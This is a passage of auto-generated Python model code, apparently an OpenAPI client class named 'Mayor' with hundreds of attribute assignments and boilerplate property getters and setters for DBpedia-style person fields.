self._national_tournament_silver = None
self._other_activity = None
self._linguistics_tradition = None
self._national_tournament_bronze = None
self._escalafon = None
self._sibling = None
self._waist_size = None
self._olympic_games_gold = None
self._general_council = None
self._arrest_date = None
self._team_manager = None
self._birth_sign = None
self._artistic_function = None
self._age = None
self._college = None
self._education = None
self._movie = None
self._achievement = None
self._death_age = None
self._type = None
self._approach = None
self._relation = None
self._victory_as_mgr = None
self._living_place = None
self._copilote = None
self._season = None
self._start_wct = None
self._catch = None
self._id = None
self._feat = None
self._decoration = None
self._case = None
self._sentence = None
self._profession = None
self._retirement_date = None
self._world_tournament = None
self._wife = None
self._allegiance = None
self._active_years_start_date_mgr = None
self._lccn_id = None
self._tattoo = None
self._british_wins = None
self._hip_size = None
self._podium = None
self._seiyu = None
self._player_season = None
self._short_prog_score = None
self._regional_council = None
self._homage = None
self._shoe_size = None
self._signature = None
self._olympic_games_bronze = None
self._danse_score = None
self._id_number = None
self._short_prog_competition = None
self._active_years_start_year_mgr = None
self._wedding_parents_date = None
self._birth_place = None
self._world = None
self._astrological_sign = None
self._eye_color = None
self._networth = None
self._coalition = None
self._national_team_match_point = None
self._national_selection = None
self._agency = None
self._start_wqs = None
self._defeat_as_mgr = None
self._death_year = None
self._world_tournament_gold = None
self._pga_wins = None
self._board = None
self._rid_id = None
self._dead_in_fight_date = None
self._related_functions = None
self._manager_season = None
self._reign = None
self._second = None
self._radio = None
self._full_competition = None
self._free_score_competition = None
self._prefect = None
self._publication = None
self._opponent = None
self._employer = None
self._affair = None
self._body_discovered = None
self._buried_place = None
self._residence = None
self._usurper = None
self._other_occupation = None
self._contest = None
self._active_years_end_date_mgr = None
self._created = None
self._original_danse_score = None
self._end_career = None
self._note_on_resting_place = None
self._army = None
self._active_year = None
self._person_function = None
self._pro_since = None
self._cause_of_death = None
self._dubber = None
self._non_professional_career = None
self._military_function = None
self._patent = None
self._creation_christian_bishop = None
self._piercing = None
self._student = None
self._bad_guy = None
self._influenced = None
self._start_reign = None
self._university = None
self._gym_apparatus = None
self._ideology = None
self._conviction_date = None
self._media = None
self._bnf_id = None
self._pseudonym = None
self._temple_year = None
self._clothing_size = None
self._speciality = None
self._award = None
self._kind_of_criminal_action = None
self._isni_id = None
self._significant_project = None
self._leadership = None
self._death_date = None
self._special_trial = None
self._resting_date = None
self._victim = None
self._has_natural_bust = None
self._masters_wins = None
self._individualised_pnd = None
self._continental_tournament_gold = None
self._orientation = None
self._grave = None
self._resting_place = None
self._abbeychurch_blessing_charge = None
self._handisport = None
self._external_ornament = None
self._third = None
self._film_number = None
self._temple = None
self._end_reign = None
self._national_tournament_gold = None
self._death_cause = None
self.discriminator = None
self.parent = parent
self.viaf_id = viaf_id
self.competition_title = competition_title
self.art_patron = art_patron
self.hair_colour = hair_colour
self.tv_show = tv_show
self.expedition = expedition
self.main_domain = main_domain
self.nndb_id = nndb_id
self.discipline = discipline
self.consecration = consecration
self.salary = salary
self.birth_name = birth_name
self.spouse = spouse
self.scene = scene
self.best_lap = best_lap
self.shoe_number = shoe_number
self.mayor_mandate = mayor_mandate
self.friend = friend
self.full_score = full_score
self.diploma = diploma
self.active_years_end_year_mgr = active_years_end_year_mgr
self.abbeychurch_blessing = abbeychurch_blessing
self.height = height
self.usopen_wins = usopen_wins
self.bust_size = bust_size
self.cloth_size = cloth_size
self.handedness = handedness
self.philosophical_school = philosophical_school
self.parliamentary_group = parliamentary_group
self.date_of_burial = date_of_burial
self.mount = mount
self.olympic_games_silver = olympic_games_silver
self.nationality = nationality
self.junior_years_start_year = junior_years_start_year
self.relative = relative
self.newspaper = newspaper
self.announced_from = announced_from
self.military_branch = military_branch
self.activity = activity
self.ethnicity = ethnicity
self.state_of_origin = state_of_origin
self.pole_position = pole_position
self.season_manager = season_manager
self.killed_by = killed_by
self.blood_type = blood_type
self.continental_tournament = continental_tournament
self.junior_years_end_year = junior_years_end_year
self.political_function = political_function
self.honours = honours
self.olympic_games = olympic_games
self.hair_color = hair_color
self.foot = foot
self.measurements = measurements
self.hand = hand
self.federation = federation
self.circumcised = circumcised
self.penis_length = penis_length
self.coemperor = coemperor
self.detractor = detractor
self.selibr_id = selibr_id
self.danse_competition = danse_competition
self.sex = sex
self.sexual_orientation = sexual_orientation
self.partner = partner
self.birth_year = birth_year
self.sports_function = sports_function
self.orcid_id = orcid_id
self.election_date = election_date
self.sport_discipline = sport_discipline
self.collaboration = collaboration
self.national_team_year = national_team_year
self.number_of_run = number_of_run
self.spouse_name = spouse_name
self.lah_hof = lah_hof
self.derived_word = derived_word
self.current_team_manager = current_team_manager
self.little_pool_record = little_pool_record
self.bpn_id = bpn_id
self.free_danse_score = free_danse_score
self.project = project
self.active_years = active_years
self.title_date = title_date
self.blood_group = blood_group
self.school = school
self.death_place = death_place
self.victory_percentage_as_mgr = victory_percentage_as_mgr
self.imposed_danse_competition = imposed_danse_competition
self.shoot = shoot
self.education_place = education_place
self.match_point = match_point
self.reign_name = reign_name
self.pro_period = pro_period
self.influenced_by = influenced_by
self.nla_id = nla_id
self.cousurper = cousurper
self.race_wins = race_wins
self.world_tournament_bronze = world_tournament_bronze
self.jutsu = jutsu
self.weight = weight
self.other_media = other_media
self.alma_mater = alma_mater
self.imposed_danse_score = imposed_danse_score
self.known_for = known_for
self.big_pool_record = big_pool_record
self.olympic_games_wins = olympic_games_wins
self.eye_colour = eye_colour
self.world_tournament_silver = world_tournament_silver
self.architectural_movement = architectural_movement
self.mood = mood
self.bibsys_id = bibsys_id
self.iihf_hof = iihf_hof
self.free_prog_score = free_prog_score
self.description = description
self.particular_sign = particular_sign
self.league_manager = league_manager
self.junior_season = junior_season
self.free_prog_competition = free_prog_competition
self.weapon = weapon
self.kind_of_criminal = kind_of_criminal
self.notable_idea = notable_idea
self.player_status = player_status
self.other_function = other_function
self.continental_tournament_silver = continental_tournament_silver
self.career_station = career_station
self.resting_place_position = resting_place_position
self.original_danse_competition = original_danse_competition
self.status_manager = status_manager
self.national_tournament = national_tournament
self.hometown = hometown
self.dead_in_fight_place = dead_in_fight_place
self.continental_tournament_bronze = continental_tournament_bronze
self.victory = victory
self.complexion = complexion
self.citizenship = citizenship
self.start = start
self.tessitura = tessitura
self.start_career = start_career
self.label = label
self.birth_date = birth_date
self.national_tournament_silver = national_tournament_silver
self.other_activity = other_activity
self.linguistics_tradition = linguistics_tradition
self.national_tournament_bronze = national_tournament_bronze
self.escalafon = escalafon
self.sibling = sibling
self.waist_size = waist_size
self.olympic_games_gold = olympic_games_gold
self.general_council = general_council
self.arrest_date = arrest_date
self.team_manager = team_manager
self.birth_sign = birth_sign
self.artistic_function = artistic_function
self.age = age
self.college = college
self.education = education
self.movie = movie
self.achievement = achievement
self.death_age = death_age
self.type = type
self.approach = approach
self.relation = relation
self.victory_as_mgr = victory_as_mgr
self.living_place = living_place
self.copilote = copilote
self.season = season
self.start_wct = start_wct
self.catch = catch
if id is not None:
self.id = id
self.feat = feat
self.decoration = decoration
self.case = case
self.sentence = sentence
self.profession = profession
self.retirement_date = retirement_date
self.world_tournament = world_tournament
self.wife = wife
self.allegiance = allegiance
self.active_years_start_date_mgr = active_years_start_date_mgr
self.lccn_id = lccn_id
self.tattoo = tattoo
self.british_wins = british_wins
self.hip_size = hip_size
self.podium = podium
self.seiyu = seiyu
self.player_season = player_season
self.short_prog_score = short_prog_score
self.regional_council = regional_council
self.homage = homage
self.shoe_size = shoe_size
self.signature = signature
self.olympic_games_bronze = olympic_games_bronze
self.danse_score = danse_score
self.id_number = id_number
self.short_prog_competition = short_prog_competition
self.active_years_start_year_mgr = active_years_start_year_mgr
self.wedding_parents_date = wedding_parents_date
self.birth_place = birth_place
self.world = world
self.astrological_sign = astrological_sign
self.eye_color = eye_color
self.networth = networth
self.coalition = coalition
self.national_team_match_point = national_team_match_point
self.national_selection = national_selection
self.agency = agency
self.start_wqs = start_wqs
self.defeat_as_mgr = defeat_as_mgr
self.death_year = death_year
self.world_tournament_gold = world_tournament_gold
self.pga_wins = pga_wins
self.board = board
self.rid_id = rid_id
self.dead_in_fight_date = dead_in_fight_date
self.related_functions = related_functions
self.manager_season = manager_season
self.reign = reign
self.second = second
self.radio = radio
self.full_competition = full_competition
self.free_score_competition = free_score_competition
self.prefect = prefect
self.publication = publication
self.opponent = opponent
self.employer = employer
self.affair = affair
self.body_discovered = body_discovered
self.buried_place = buried_place
self.residence = residence
self.usurper = usurper
self.other_occupation = other_occupation
self.contest = contest
self.active_years_end_date_mgr = active_years_end_date_mgr
self.created = created
self.original_danse_score = original_danse_score
self.end_career = end_career
self.note_on_resting_place = note_on_resting_place
self.army = army
self.active_year = active_year
self.person_function = person_function
self.pro_since = pro_since
self.cause_of_death = cause_of_death
self.dubber = dubber
self.non_professional_career = non_professional_career
self.military_function = military_function
self.patent = patent
self.creation_christian_bishop = creation_christian_bishop
self.piercing = piercing
self.student = student
self.bad_guy = bad_guy
self.influenced = influenced
self.start_reign = start_reign
self.university = university
self.gym_apparatus = gym_apparatus
self.ideology = ideology
self.conviction_date = conviction_date
self.media = media
self.bnf_id = bnf_id
self.pseudonym = pseudonym
self.temple_year = temple_year
self.clothing_size = clothing_size
self.speciality = speciality
self.award = award
self.kind_of_criminal_action = kind_of_criminal_action
self.isni_id = isni_id
self.significant_project = significant_project
self.leadership = leadership
self.death_date = death_date
self.special_trial = special_trial
self.resting_date = resting_date
self.victim = victim
self.has_natural_bust = has_natural_bust
self.masters_wins = masters_wins
self.individualised_pnd = individualised_pnd
self.continental_tournament_gold = continental_tournament_gold
self.orientation = orientation
self.grave = grave
self.resting_place = resting_place
self.abbeychurch_blessing_charge = abbeychurch_blessing_charge
self.handisport = handisport
self.external_ornament = external_ornament
self.third = third
self.film_number = film_number
self.temple = temple
self.end_reign = end_reign
self.national_tournament_gold = national_tournament_gold
self.death_cause = death_cause
@property
def parent(self):
"""Gets the parent of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The parent of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._parent
@parent.setter
def parent(self, parent):
"""Sets the parent of this Mayor.
Description not available # noqa: E501
:param parent: The parent of this Mayor. # noqa: E501
:type: list[object]
"""
self._parent = parent
@property
def viaf_id(self):
"""Gets the viaf_id of this Mayor. # noqa: E501
International authority data from the Online Computer Library Center (OCLC) # noqa: E501
:return: The viaf_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._viaf_id
@viaf_id.setter
def viaf_id(self, viaf_id):
"""Sets the viaf_id of this Mayor.
International authority data from the Online Computer Library Center (OCLC) # noqa: E501
:param viaf_id: The viaf_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._viaf_id = viaf_id
@property
def competition_title(self):
"""Gets the competition_title of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The competition_title of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._competition_title
@competition_title.setter
def competition_title(self, competition_title):
"""Sets the competition_title of this Mayor.
Description not available # noqa: E501
:param competition_title: The competition_title of this Mayor. # noqa: E501
:type: list[object]
"""
self._competition_title = competition_title
@property
def art_patron(self):
"""Gets the art_patron of this Mayor. # noqa: E501
An influential, wealthy person who supported an artist, craftsman, a scholar or a noble.. See also # noqa: E501
:return: The art_patron of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._art_patron
@art_patron.setter
def art_patron(self, art_patron):
"""Sets the art_patron of this Mayor.
An influential, wealthy person who supported an artist, craftsman, a scholar or a noble.. See also # noqa: E501
:param art_patron: The art_patron of this Mayor. # noqa: E501
:type: list[object]
"""
self._art_patron = art_patron
@property
def hair_colour(self):
"""Gets the hair_colour of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hair_colour of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._hair_colour
@hair_colour.setter
def hair_colour(self, hair_colour):
"""Sets the hair_colour of this Mayor.
Description not available # noqa: E501
:param hair_colour: The hair_colour of this Mayor. # noqa: E501
:type: list[str]
"""
self._hair_colour = hair_colour
@property
def tv_show(self):
"""Gets the tv_show of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The tv_show of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._tv_show
@tv_show.setter
def tv_show(self, tv_show):
"""Sets the tv_show of this Mayor.
Description not available # noqa: E501
:param tv_show: The tv_show of this Mayor. # noqa: E501
:type: list[object]
"""
self._tv_show = tv_show
@property
def expedition(self):
"""Gets the expedition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The expedition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._expedition
@expedition.setter
def expedition(self, expedition):
"""Sets the expedition of this Mayor.
Description not available # noqa: E501
:param expedition: The expedition of this Mayor. # noqa: E501
:type: list[str]
"""
self._expedition = expedition
@property
def main_domain(self):
"""Gets the main_domain of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The main_domain of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._main_domain
@main_domain.setter
def main_domain(self, main_domain):
"""Sets the main_domain of this Mayor.
Description not available # noqa: E501
:param main_domain: The main_domain of this Mayor. # noqa: E501
:type: list[object]
"""
self._main_domain = main_domain
@property
def nndb_id(self):
"""Gets the nndb_id of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The nndb_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._nndb_id
@nndb_id.setter
def nndb_id(self, nndb_id):
"""Sets the nndb_id of this Mayor.
Description not available # noqa: E501
:param nndb_id: The nndb_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._nndb_id = nndb_id
@property
def discipline(self):
"""Gets the discipline of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The discipline of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._discipline
@discipline.setter
def discipline(self, discipline):
"""Sets the discipline of this Mayor.
Description not available # noqa: E501
:param discipline: The discipline of this Mayor. # noqa: E501
:type: list[object]
"""
self._discipline = discipline
@property
def consecration(self):
"""Gets the consecration of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The consecration of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._consecration
@consecration.setter
def consecration(self, consecration):
"""Sets the consecration of this Mayor.
Description not available # noqa: E501
:param consecration: The consecration of this Mayor. # noqa: E501
:type: list[str]
"""
self._consecration = consecration
@property
def salary(self):
"""Gets the salary of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The salary of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._salary
@salary.setter
def salary(self, salary):
"""Sets the salary of this Mayor.
Description not available # noqa: E501
:param salary: The salary of this Mayor. # noqa: E501
:type: list[float]
"""
self._salary = salary
@property
def birth_name(self):
"""Gets the birth_name of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_name of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._birth_name
@birth_name.setter
def birth_name(self, birth_name):
"""Sets the birth_name of this Mayor.
Description not available # noqa: E501
:param birth_name: The birth_name of this Mayor. # noqa: E501
:type: list[str]
"""
self._birth_name = birth_name
@property
def spouse(self):
"""Gets the spouse of this Mayor. # noqa: E501
the person they are married to # noqa: E501
:return: The spouse of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._spouse
@spouse.setter
def spouse(self, spouse):
"""Sets the spouse of this Mayor.
the person they are married to # noqa: E501
:param spouse: The spouse of this Mayor. # noqa: E501
:type: list[object]
"""
self._spouse = spouse
@property
def scene(self):
"""Gets the scene of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The scene of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._scene
@scene.setter
def scene(self, scene):
"""Sets the scene of this Mayor.
Description not available # noqa: E501
:param scene: The scene of this Mayor. # noqa: E501
:type: list[str]
"""
self._scene = scene
@property
def best_lap(self):
"""Gets the best_lap of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The best_lap of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._best_lap
@best_lap.setter
def best_lap(self, best_lap):
"""Sets the best_lap of this Mayor.
Description not available # noqa: E501
:param best_lap: The best_lap of this Mayor. # noqa: E501
:type: list[str]
"""
self._best_lap = best_lap
@property
def shoe_number(self):
"""Gets the shoe_number of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The shoe_number of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._shoe_number
@shoe_number.setter
def shoe_number(self, shoe_number):
"""Sets the shoe_number of this Mayor.
Description not available # noqa: E501
:param shoe_number: The shoe_number of this Mayor. # noqa: E501
:type: list[int]
"""
self._shoe_number = shoe_number
@property
def mayor_mandate(self):
"""Gets the mayor_mandate of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The mayor_mandate of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._mayor_mandate
@mayor_mandate.setter
def mayor_mandate(self, mayor_mandate):
"""Sets the mayor_mandate of this Mayor.
Description not available # noqa: E501
:param mayor_mandate: The mayor_mandate of this Mayor. # noqa: E501
:type: list[str]
"""
self._mayor_mandate = mayor_mandate
@property
def friend(self):
"""Gets the friend of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The friend of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._friend
@friend.setter
def friend(self, friend):
"""Sets the friend of this Mayor.
Description not available # noqa: E501
:param friend: The friend of this Mayor. # noqa: E501
:type: list[object]
"""
self._friend = friend
@property
def full_score(self):
"""Gets the full_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The full_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._full_score
@full_score.setter
def full_score(self, full_score):
"""Sets the full_score of this Mayor.
Description not available # noqa: E501
:param full_score: The full_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._full_score = full_score
@property
def diploma(self):
"""Gets the diploma of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The diploma of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._diploma
@diploma.setter
def diploma(self, diploma):
"""Sets the diploma of this Mayor.
Description not available # noqa: E501
:param diploma: The diploma of this Mayor. # noqa: E501
:type: list[object]
"""
self._diploma = diploma
@property
def active_years_end_year_mgr(self):
"""Gets the active_years_end_year_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_end_year_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_end_year_mgr
@active_years_end_year_mgr.setter
def active_years_end_year_mgr(self, active_years_end_year_mgr):
"""Sets the active_years_end_year_mgr of this Mayor.
Description not available # noqa: E501
:param active_years_end_year_mgr: The active_years_end_year_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_end_year_mgr = active_years_end_year_mgr
@property
def abbeychurch_blessing(self):
"""Gets the abbeychurch_blessing of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The abbeychurch_blessing of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._abbeychurch_blessing
@abbeychurch_blessing.setter
def abbeychurch_blessing(self, abbeychurch_blessing):
"""Sets the abbeychurch_blessing of this Mayor.
Description not available # noqa: E501
:param abbeychurch_blessing: The abbeychurch_blessing of this Mayor. # noqa: E501
:type: list[str]
"""
self._abbeychurch_blessing = abbeychurch_blessing
@property
def height(self):
"""Gets the height of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The height of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._height
@height.setter
def height(self, height):
"""Sets the height of this Mayor.
Description not available # noqa: E501
:param height: The height of this Mayor. # noqa: E501
:type: list[object]
"""
self._height = height
@property
def usopen_wins(self):
"""Gets the usopen_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The usopen_wins of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._usopen_wins
@usopen_wins.setter
def usopen_wins(self, usopen_wins):
"""Sets the usopen_wins of this Mayor.
Description not available # noqa: E501
:param usopen_wins: The usopen_wins of this Mayor. # noqa: E501
:type: list[object]
"""
self._usopen_wins = usopen_wins
@property
def bust_size(self):
"""Gets the bust_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The bust_size of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._bust_size
@bust_size.setter
def bust_size(self, bust_size):
"""Sets the bust_size of this Mayor.
Description not available # noqa: E501
:param bust_size: The bust_size of this Mayor. # noqa: E501
:type: list[float]
"""
self._bust_size = bust_size
@property
def cloth_size(self):
"""Gets the cloth_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The cloth_size of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._cloth_size
@cloth_size.setter
def cloth_size(self, cloth_size):
"""Sets the cloth_size of this Mayor.
Description not available # noqa: E501
:param cloth_size: The cloth_size of this Mayor. # noqa: E501
:type: list[str]
"""
self._cloth_size = cloth_size
@property
def handedness(self):
"""Gets the handedness of this Mayor. # noqa: E501
an attribute of humans defined by their unequal distribution of fine motor skill between the left and right hands. # noqa: E501
:return: The handedness of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._handedness
@handedness.setter
def handedness(self, handedness):
"""Sets the handedness of this Mayor.
an attribute of humans defined by their unequal distribution of fine motor skill between the left and right hands. # noqa: E501
:param handedness: The handedness of this Mayor. # noqa: E501
:type: list[object]
"""
self._handedness = handedness
@property
def philosophical_school(self):
"""Gets the philosophical_school of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The philosophical_school of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._philosophical_school
@philosophical_school.setter
def philosophical_school(self, philosophical_school):
"""Sets the philosophical_school of this Mayor.
Description not available # noqa: E501
:param philosophical_school: The philosophical_school of this Mayor. # noqa: E501
:type: list[object]
"""
self._philosophical_school = philosophical_school
@property
def parliamentary_group(self):
"""Gets the parliamentary_group of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The parliamentary_group of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._parliamentary_group
@parliamentary_group.setter
def parliamentary_group(self, parliamentary_group):
"""Sets the parliamentary_group of this Mayor.
Description not available # noqa: E501
:param parliamentary_group: The parliamentary_group of this Mayor. # noqa: E501
:type: list[str]
"""
self._parliamentary_group = parliamentary_group
@property
def date_of_burial(self):
"""Gets the date_of_burial of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The date_of_burial of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._date_of_burial
@date_of_burial.setter
def date_of_burial(self, date_of_burial):
"""Sets the date_of_burial of this Mayor.
Description not available # noqa: E501
:param date_of_burial: The date_of_burial of this Mayor. # noqa: E501
:type: list[str]
"""
self._date_of_burial = date_of_burial
@property
def mount(self):
"""Gets the mount of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The mount of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._mount
@mount.setter
def mount(self, mount):
"""Sets the mount of this Mayor.
Description not available # noqa: E501
:param mount: The mount of this Mayor. # noqa: E501
:type: list[str]
"""
self._mount = mount
@property
def olympic_games_silver(self):
"""Gets the olympic_games_silver of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_silver of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._olympic_games_silver
@olympic_games_silver.setter
def olympic_games_silver(self, olympic_games_silver):
"""Sets the olympic_games_silver of this Mayor.
Description not available # noqa: E501
:param olympic_games_silver: The olympic_games_silver of this Mayor. # noqa: E501
:type: list[int]
"""
self._olympic_games_silver = olympic_games_silver
@property
def nationality(self):
"""Gets the nationality of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The nationality of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._nationality
@nationality.setter
def nationality(self, nationality):
"""Sets the nationality of this Mayor.
Description not available # noqa: E501
:param nationality: The nationality of this Mayor. # noqa: E501
:type: list[object]
"""
self._nationality = nationality
@property
def junior_years_start_year(self):
"""Gets the junior_years_start_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The junior_years_start_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._junior_years_start_year
@junior_years_start_year.setter
def junior_years_start_year(self, junior_years_start_year):
"""Sets the junior_years_start_year of this Mayor.
Description not available # noqa: E501
:param junior_years_start_year: The junior_years_start_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._junior_years_start_year = junior_years_start_year
@property
def relative(self):
"""Gets the relative of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The relative of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._relative
@relative.setter
def relative(self, relative):
"""Sets the relative of this Mayor.
Description not available # noqa: E501
:param relative: The relative of this Mayor. # noqa: E501
:type: list[object]
"""
self._relative = relative
@property
def newspaper(self):
"""Gets the newspaper of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The newspaper of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._newspaper
@newspaper.setter
def newspaper(self, newspaper):
"""Sets the newspaper of this Mayor.
Description not available # noqa: E501
:param newspaper: The newspaper of this Mayor. # noqa: E501
:type: list[object]
"""
self._newspaper = newspaper
@property
def announced_from(self):
"""Gets the announced_from of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The announced_from of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._announced_from
@announced_from.setter
def announced_from(self, announced_from):
"""Sets the announced_from of this Mayor.
Description not available # noqa: E501
:param announced_from: The announced_from of this Mayor. # noqa: E501
:type: list[object]
"""
self._announced_from = announced_from
@property
def military_branch(self):
"""Gets the military_branch of this Mayor. # noqa: E501
The service branch (Army, Navy, etc.) a person is part of. # noqa: E501
:return: The military_branch of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._military_branch
@military_branch.setter
def military_branch(self, military_branch):
"""Sets the military_branch of this Mayor.
The service branch (Army, Navy, etc.) a person is part of. # noqa: E501
:param military_branch: The military_branch of this Mayor. # noqa: E501
:type: list[object]
"""
self._military_branch = military_branch
@property
def activity(self):
"""Gets the activity of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The activity of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._activity
@activity.setter
def activity(self, activity):
"""Sets the activity of this Mayor.
Description not available # noqa: E501
:param activity: The activity of this Mayor. # noqa: E501
:type: list[object]
"""
self._activity = activity
@property
def ethnicity(self):
"""Gets the ethnicity of this Mayor. # noqa: E501
Μία ορισμένη κοινωνική κατηγορία ανθρώπων που έχουν κοινή καταγωγή ή εμπειρίες. # noqa: E501
:return: The ethnicity of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._ethnicity
@ethnicity.setter
def ethnicity(self, ethnicity):
"""Sets the ethnicity of this Mayor.
Μία ορισμένη κοινωνική κατηγορία ανθρώπων που έχουν κοινή καταγωγή ή εμπειρίες. # noqa: E501
:param ethnicity: The ethnicity of this Mayor. # noqa: E501
:type: list[object]
"""
self._ethnicity = ethnicity
@property
def state_of_origin(self):
"""Gets the state_of_origin of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The state_of_origin of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._state_of_origin
@state_of_origin.setter
def state_of_origin(self, state_of_origin):
"""Sets the state_of_origin of this Mayor.
Description not available # noqa: E501
:param state_of_origin: The state_of_origin of this Mayor. # noqa: E501
:type: list[object]
"""
self._state_of_origin = state_of_origin
@property
def pole_position(self):
"""Gets the pole_position of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The pole_position of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._pole_position
@pole_position.setter
def pole_position(self, pole_position):
"""Sets the pole_position of this Mayor.
Description not available # noqa: E501
:param pole_position: The pole_position of this Mayor. # noqa: E501
:type: list[int]
"""
self._pole_position = pole_position
@property
def season_manager(self):
"""Gets the season_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The season_manager of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._season_manager
@season_manager.setter
def season_manager(self, season_manager):
"""Sets the season_manager of this Mayor.
Description not available # noqa: E501
:param season_manager: The season_manager of this Mayor. # noqa: E501
:type: list[str]
"""
self._season_manager = season_manager
@property
def killed_by(self):
"""Gets the killed_by of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The killed_by of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._killed_by
@killed_by.setter
def killed_by(self, killed_by):
"""Sets the killed_by of this Mayor.
Description not available # noqa: E501
:param killed_by: The killed_by of this Mayor. # noqa: E501
:type: list[str]
"""
self._killed_by = killed_by
@property
def blood_type(self):
"""Gets the blood_type of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The blood_type of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._blood_type
@blood_type.setter
def blood_type(self, blood_type):
"""Sets the blood_type of this Mayor.
Description not available # noqa: E501
:param blood_type: The blood_type of this Mayor. # noqa: E501
:type: list[object]
"""
self._blood_type = blood_type
@property
def continental_tournament(self):
"""Gets the continental_tournament of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The continental_tournament of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._continental_tournament
@continental_tournament.setter
def continental_tournament(self, continental_tournament):
"""Sets the continental_tournament of this Mayor.
Description not available # noqa: E501
:param continental_tournament: The continental_tournament of this Mayor. # noqa: E501
:type: list[object]
"""
self._continental_tournament = continental_tournament
@property
def junior_years_end_year(self):
"""Gets the junior_years_end_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The junior_years_end_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._junior_years_end_year
@junior_years_end_year.setter
def junior_years_end_year(self, junior_years_end_year):
"""Sets the junior_years_end_year of this Mayor.
Description not available # noqa: E501
:param junior_years_end_year: The junior_years_end_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._junior_years_end_year = junior_years_end_year
@property
def political_function(self):
"""Gets the political_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The political_function of this Mayor. # noqa: E501
:rtype: list[str]
